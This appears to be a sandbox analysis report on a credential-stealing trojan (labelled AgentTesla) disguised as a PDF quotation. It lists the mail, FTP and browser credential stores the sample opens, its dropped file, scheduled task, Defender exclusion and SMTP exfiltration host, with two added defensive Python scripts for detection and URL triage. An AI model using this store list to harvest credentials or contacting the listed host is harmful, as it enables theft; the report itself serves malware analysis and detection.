                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR

Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match | File source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR
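The "File opened" / "Key opened" rows above are the raw evidence behind the credential-theft signatures: one process touching the Thunderbird, IncrediMail and Outlook profiles, the WinSCP, SmartFTP and FileZilla session stores, and the Firefox and Chrome login databases in a single run. The following Python script is an added example (not code from the Joe Sandbox report): it parses rows in exactly that form, maps each accessed path or registry key to a known credential store, and flags a process that sweeps several unrelated store categories. SAMPLE_REPORT_LINES is constructed from this section's rows; the CREDENTIAL_STORES table, the mail/ftp/browser grouping and the "two or more categories" threshold are the editor's assumptions, not the sandbox's own signature logic.

```python
"""Map sandbox file/registry accesses to known credential stores.

Added example, not code from the Joe Sandbox report. SAMPLE_REPORT_LINES
is constructed from the "File opened" / "Key opened" rows of this section;
CREDENTIAL_STORES and the category threshold are the editor's assumptions,
not the sandbox's own signature definitions.
"""
import re
from collections import defaultdict

# (category, product, regex on the accessed path or registry key).
# Grouping into mail / ftp / browser is an assumption for this example.
CREDENTIAL_STORES = [
    ("mail", "Thunderbird", r"\\Thunderbird\\profiles\.ini$"),
    ("mail", "IncrediMail", r"\\IncrediMail\\Identities$"),
    ("mail", "Outlook", r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    ("ftp", "WinSCP", r"\\Martin Prikryl\\WinSCP 2\\Sessions$"),
    ("ftp", "SmartFTP", r"\\SmartFTP\\Client 2\.0\\Favorites\\"),
    ("ftp", "FileZilla", r"\\FileZilla\\recentservers\.xml$"),
    ("browser", "Firefox", r"\\Mozilla\\Firefox\\profiles\.ini$"),
    ("browser", "Chrome", r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$"),
]

# Accepts the raw extraction form ("...exeFile opened: ...Jump to behavior")
# as well as a "Source: <proc> | File opened: <target>" form.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*\|?\s*(?:File|Key) opened:\s*"
    r"(?P<target>.+?)\s*(?:Jump to behavior)?\s*$"
)

# Constructed from the report rows above; the last line is a non-access
# row included to show that it is ignored.
SAMPLE_REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior",
]


def parse_access(line):
    """Return (process, target) for a file/key access row, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("proc").strip(), m.group("target").strip()


def classify_target(target):
    """Return (category, product) if target is a known credential store."""
    for category, product, pattern in CREDENTIAL_STORES:
        if re.search(pattern, target, re.IGNORECASE):
            return category, product
    return None


def summarize(lines):
    """Per process: the store categories touched and the products in each."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in lines:
        parsed = parse_access(line)
        if parsed is None:
            continue
        proc, target = parsed
        store = classify_target(target)
        if store is not None:
            category, product = store
            hits[proc][category].add(product)
    return {p: {c: sorted(v) for c, v in cats.items()} for p, cats in hits.items()}


def stealer_verdict(summary, min_categories=2):
    """Processes that swept stores of at least min_categories unrelated kinds.
    The threshold is an assumption: a mail client reads its own profile, a
    stealer reads mail, ftp and browser stores in one run."""
    return sorted(p for p, cats in summary.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    summary = summarize(SAMPLE_REPORT_LINES)
    for proc, cats in summary.items():
        print(proc)
        for category, products in cats.items():
            print(f"  {category}: {', '.join(products)}")
    print("stealer profile:", stealer_verdict(summary))
```

Run on this section's rows the script attributes all three categories (mail, ftp, browser) to the sample process and ignores the powershell.exe volume query. The same table can be fed from Sysmon event ID 11/12/13 or an EDR file/registry audit instead of sandbox rows; only LINE_RE needs to change.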

Remote Access Functionality

Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR
MITRE ATT&CK matrix, transposed: one tactic per line, techniques in the report's row order. Techniques the report highlights for this sample carry the report's digit badge in brackets; the remaining entries are the unhighlighted matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: [211] Windows Management Instrumentation; [1] Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: [1] Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: [11] Process Injection; [1] Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: [1] Masquerading; [11] Disable or Modify Tools; [131] Virtualization/Sandbox Evasion; [11] Process Injection; [1] Deobfuscate/Decode Files or Information; [2] Obfuscated Files or Information; [13] Software Packing
Credential Access: [2] OS Credential Dumping; [1] Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: [311] Security Software Discovery; [1] Process Discovery; [131] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [1] Remote System Discovery; [1] File and Directory Discovery; [114] System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: [1] Email Collection; [11] Archive Collected Data; [2] Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: [1] Encrypted Channel; [1] Non-Standard Port; [1] Non-Application Layer Protocol; [11] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Behavior Graph ID: 652379 | Sample: UN-Quotation 70000000187366... | Startdate: 26/06/2022 | Architecture: WINDOWS | Score: 100

Graph rendered as a process tree (graph node ids in brackets; the number after a process name is the badge the graph shows next to it):

Start [2]
  signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 13 other signatures
  -> UN-Quotation 70000000187366444_PDF.exe 7 [7] started
       created files: C:\Users\user\AppData\Roaming\XrgnLg.exe (PE32, dropped); C:\Users\user\...\XrgnLg.exe:Zone.Identifier (ASCII, dropped); C:\Users\user\AppData\Local\...\tmp25F3.tmp (XML, dropped); UN-Quotation 70000...7366444_PDF.exe.log (ASCII, dropped)
       signature: Adds a directory exclusion to Windows Defender
       -> UN-Quotation 70000000187366444_PDF.exe 2 [11] started
            DNS/IP: mail.bonsa.lt 193.46.84.142, ports 49741, 587, BST-LT Lithuania
            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
       -> powershell.exe 24 [15] started
            -> conhost.exe [21] started
       -> powershell.exe 25 [17] started
            -> conhost.exe [23] started
       -> schtasks.exe 1 [19] started
            -> conhost.exe [25] started

Initial sample | Detection | Scanner | Label
UN-Quotation 70000000187366444_PDF.exe | 38% | Virustotal |
UN-Quotation 70000000187366444_PDF.exe | 20% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
UN-Quotation 70000000187366444_PDF.exe | 100% | Joe Sandbox ML |

Dropped file | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\XrgnLg.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\XrgnLg.exe | 20% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE | Detection | Scanner | Label
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8

Domain | Detection | Scanner | Label
mail.bonsa.lt | 0% | Virustotal |

URL | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.carterandcone.comn-u | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.zhongyicts.com.cnn-u | 0% | URL Reputation | safe
http://fontfabrik.comH: | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://api.ipify.org%%startupfolder% | 0% | URL Reputation | safe
http://www.carterandcone.comue4B | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.net8bX | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.carterandcone.com: | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krcom | 0% | URL Reputation | safe
http://www.carterandcone.com.HB | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comY | 0% | Avira URL Cloud | safe
http://www.fontbureau.commsd | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://www.carterandcone.como.HB | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.carterandcone.comQ | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.carterandcone.como. | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.zhongyicts.com.cnue4B | 0% | Avira URL Cloud | safe
https://api.ipify.org% | 0% | URL Reputation | safe
http://www.carterandcone.coma | 0% | URL Reputation | safe
http://www.fontbureau.comcomd | 0% | URL Reputation | safe
https://oVr11J0CkkX1DVO37.net | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn8OX | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://www.carterandcone.comv | 0% | URL Reputation | safe
http://mail.bonsa.lt | 0% | Avira URL Cloud | safe
http://en.w | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://lAnHfH.com | 0% | Avira URL Cloud | safe
http://www.fontbureau.comcomF | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/jBu | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krim | 0% | URL Reputation | safe
http://www.tiro.comNorm | 0% | Avira URL Cloud | safe
http://www.fontbureau.comals | 0% | URL Reputation | safe
http://www.fontbureau.comalic | 0% | URL Reputation | safe
http://www.goodfont.co.krfk6 | 0% | Avira URL Cloud | safe
http://www.typography.netiv | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn# | 0% | URL Reputation | safe
http://www.carterandcone.comn-uFi | 0% | Avira URL Cloud | safe
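The URL table above mixes two kinds of strings: a handful that matter for this sample (the SMTP host mail.bonsa.lt, the api.ipify.org public-IP lookup, a torbrowser zip path, DynDns, the 127.0.0.1 loopback string) and dozens of type-foundry addresses with trailing garbage ("comn-u", "co.krcom", "netD") that are carved out of font metadata next to other bytes. The script below is an added example, not part of the Joe Sandbox report: it recovers the host from each carved string by cutting right after a public suffix, drops the foundry noise and returns the hosts an analyst should actually look at. SAMPLE_URLS is constructed from the table above; FONT_FOUNDRY_HOSTS (the assumption that these hosts come from the fonts a .NET/GDI+ process enumerates), KNOWN_IOC_HOSTS and the SUFFIX list limited to suffixes seen in this report are the editor's assumptions.

```python
"""Triage URL strings carved from process memory by a sandbox.

Added example, not code from the Joe Sandbox report. SAMPLE_URLS is
constructed from the report's URL table. Labelled assumptions: the
font-foundry host list (strings that sit in the metadata of fonts a
.NET/GDI+ process enumerates, treated as noise), the IOC labels, and
the public-suffix list, which covers only suffixes seen in this report.
"""
import ipaddress
import re

# Type foundries whose URLs appear in font file metadata (assumption).
FONT_FOUNDRY_HOSTS = {
    "www.fontbureau.com", "www.carterandcone.com", "www.founder.com.cn",
    "www.zhongyicts.com.cn", "fontfabrik.com", "www.tiro.com",
    "www.goodfont.co.kr", "www.sajatypeworks.com", "www.typography.net",
    "www.galapagosdesign.com", "www.sandoll.co.kr", "www.urwpp.de",
    "www.sakkal.com", "www.jiyu-kobo.co.jp",
}

# Hosts worth an analyst's attention and why (editor's reading of the report).
KNOWN_IOC_HOSTS = {
    "mail.bonsa.lt": "smtp host contacted on port 587 in the report",
    "api.ipify.org": "public-IP lookup",
    "www.theonionrouter.com": "tor-win32 zip download path",
    "dyndns.com": "dynamic DNS",
}

# A carved URL is cut right after the public suffix, so memory residue such
# as "comn-u" or "co.krcom" is dropped. Suffix set is an assumption.
SUFFIX = r"(?:com\.cn|co\.kr|co\.jp|com|net|org|lt|de)"
HOST_RE = re.compile(r"^https?://((?:[a-z0-9-]+\.)+?" + SUFFIX + ")", re.IGNORECASE)
IP_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})")

# Constructed from the report's URL table, foundry noise included.
SAMPLE_URLS = [
    "http://127.0.0.1:HTTP/1.1",
    "http://www.carterandcone.comn-u",
    "http://www.founder.com.cn/cn/bThe",
    "http://www.zhongyicts.com.cnn-u",
    "http://fontfabrik.comH:",
    "https://api.ipify.org%%startupfolder%",
    "http://www.sandoll.co.krcom",
    "http://www.fontbureau.commsd",
    "http://DynDns.comDynDNSnamejidpasswordPsi/Psi",
    "https://oVr11J0CkkX1DVO37.net",
    "https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www",
    "http://mail.bonsa.lt",
    "http://en.w",
    "http://lAnHfH.com",
    "http://www.jiyu-kobo.co.jp/",
    "http://www.urwpp.deDPlease",
]


def extract_host(url):
    """Host of a carved URL, or None when no host with a known suffix is present."""
    m = IP_RE.match(url)
    if m:
        try:
            return str(ipaddress.ip_address(m.group(1)))
        except ValueError:
            return None
    m = HOST_RE.match(url)
    return m.group(1).lower() if m else None


def triage(url):
    """(host, label) for one carved URL string."""
    host = extract_host(url)
    if host is None:
        return None, "unparseable fragment"
    if host in FONT_FOUNDRY_HOSTS:
        return host, "font-foundry metadata (noise)"
    if host in KNOWN_IOC_HOSTS:
        return host, KNOWN_IOC_HOSTS[host]
    try:
        if ipaddress.ip_address(host).is_loopback:
            return host, "loopback address"
    except ValueError:
        pass
    return host, "unclassified host, review manually"


def triage_all(urls):
    """Drop noise and fragments, deduplicate by host, sort by host."""
    kept = {}
    for url in urls:
        host, label = triage(url)
        if host is not None and not label.endswith("(noise)"):
            kept.setdefault(host, label)
    return sorted(kept.items())


if __name__ == "__main__":
    for host, label in triage_all(SAMPLE_URLS):
        print(f"{host:30} {label}")
```

On the sample list the foundry hosts and the "en.w" fragment disappear, and what remains is the SMTP host, the IP-lookup service, the Tor download host, DynDns, the loopback string and two hosts with random-looking names (lAnHfH.com, oVr11J0CkkX1DVO37.net) that are left for manual review rather than labelled.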
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.bonsa.lt | 193.46.84.142 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation

URL: http://127.0.0.1:HTTP/1.1
  Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: low

URL: http://www.fontbureau.com/designersG
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: none listed | Reputation: high

URL: http://www.carterandcone.comn-u
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.fontbureau.com/designers/?
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: none listed | Reputation: high

URL: http://www.founder.com.cn/cn/bThe
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.zhongyicts.com.cnn-u
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.fontbureau.com/designers?
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: none listed | Reputation: high

URL: http://fontfabrik.comH:
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.tiro.com
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251850802.0000000005582000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251932047.0000000005583000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.fontbureau.com/designers
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260487275.00000000055AD000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: none listed | Reputation: high

URL: https://api.ipify.org%%startupfolder%
  Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: low

